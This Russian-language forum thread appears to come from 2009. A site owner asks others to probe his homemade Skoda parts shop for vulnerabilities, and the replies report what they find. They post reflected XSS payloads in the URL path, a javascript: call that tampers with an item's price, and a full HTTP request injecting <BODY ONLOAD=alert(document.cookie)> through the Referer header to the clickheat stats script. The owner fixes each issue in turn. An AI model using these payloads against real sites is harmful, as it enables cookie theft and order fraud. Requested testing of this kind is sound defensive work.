День добрый.

Парни/девчонки прощу вас проверить мой сайт на наличие уязвимостей.
http://skoda-tech.ru
кнопку "оформить заказ" просьба не трогать. не доделал еще.

благодарю за помощь.

хорошо, парни.я все понял. всем спасибо...доделаю до полной готовности и прийду еще.

В поиске вбил C
Потом в адресной строке
javascript:add_spare_in_bag("MFA615143","%D0%9C%D0%BE%D0%B4%D0%B5%D0%BB%D1%8C%201:43%20OCta via%20cup%202005","1","0.руб")
Кароч можно кажись дешёево взять.

В поиске вбил C
Потом в адресной строке

Кароч можно кажись дешёево взять.
да технически такая возможность присуствовала, спасибо, но на втором конце сисдит манагер=).

http://skoda-tech.ru/s_%22%3E%3Cscript%3Ealert(/aaa/)%3C/script%3E
Алерта нет,но диз разъежаца

http://skoda-tech.ru/s_%22%3E%3Cscript%3Ealert(/aaa/)%3C/script%3E
Алерта нет,но диз разъежаца
нет не алерт, относительные пути картинок были, поправил

http://skoda-tech.ru/s_%3C/title%3E%3Cscript%3Ealert(/ALERT/)%3C/script%3E
алерт есть

алерт есть
пофиксил...спасибо тебе, "+"

Не такой уж и самопал)
>> http://skoda-tech.ru/clicks/ - clickheat

>> XSS
Запрос:
GET http://skoda-tech.ru/clicks/click.php?s=skoda-tech.ru&g=/s_%D0%A1%D1%82%D0%B5%D0%BA%D0%BB%D0%BE&x=76&y=481&w=1265&b=firefox&c=1&random=Sun%20Oct%2011%202009%2005:06:45%20GMT+0400 %20(MSD) HTTP/1.1
Host: skoda-tech.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: language=en; PHPSESSID=som5sjb7epoqjohki3jpfiakc2
Referer: http://<HTML><BODY ONLOAD=alert(document.cookie)>/

Ответ:
Forbidden domain (<html><BODY ONLOAD=alert(document.cookie)>), change or remove security settings in the config panel to allow this one

Не такой уж и самопал)
>> http://skoda-tech.ru/clicks/ - clickheat

>> XSS
Запрос:
GET http://skoda-tech.ru/clicks/click.php?s=skoda-tech.ru&g=/s_%D0%A1%D1%82%D0%B5%D0%BA%D0%BB%D0%BE&x=76&y=481&w=1265&b=firefox&c=1&random=Sun%20Oct%2011%202009%2005:06:45%20GMT+0400 %20(MSD) HTTP/1.1
Host: skoda-tech.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: language=en; PHPSESSID=som5sjb7epoqjohki3jpfiakc2
Referer: http://<HTML><BODY ONLOAD=alert(document.cookie)>/

Ответ:
Forbidden domain (<html><BODY ONLOAD=alert(document.cookie)>), change or remove security settings in the config panel to allow this one

подозревал что что-то подобное в этой статистике будет...ридется отключить...один хер толку мало...
движок весь самопальный...кроме этого сервиса статистики...но если кто-то будет его ставить лучше не надо...толку мало...сегодня проапдейчу...и велком...для дальнейших изувечий=)